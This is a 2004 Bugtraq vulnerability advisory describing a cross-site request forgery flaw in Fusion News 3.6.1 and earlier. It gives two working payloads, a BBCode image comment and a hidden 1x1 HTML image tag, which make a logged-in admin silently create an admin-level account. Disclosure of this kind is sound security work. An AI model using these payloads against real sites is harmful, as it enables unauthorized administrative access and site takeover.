[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040729225224.24449.qmail@www.securityfocus.com>
Date: 29 Jul 2004 22:52:24 -0000
From: Joseph Moniz <r3d_5pik3@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Fusion News Yet Another Unauthorized Account Addition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product: Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions: 3.6.1 and lower
Description: A widely used news management system
Vulnerabilities: Unauthorized Account Addition Vulnerability
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY patching the previous similar exploit. Basicly all the vendor did to stop the last vulnrability was make it so you had to be signd on as an admin to creat an account, and that is simply just not enough.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)
Unlike the previous related vulnrability this one you cant simply type something into the url bar and press enter. All you have to do is make sure the admin is logged on then do one of the following. (the first is probably the most reliable for an attacker)
1.)Leave them a comment with an [img] bbcode set like this
[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]
2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By convincing him to go to a site that has a malicious <img> tag such as the following
<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">
That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
Give me 5 seconds to press the send button to the vendor ;)
-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
Powered by blists - more mailing lists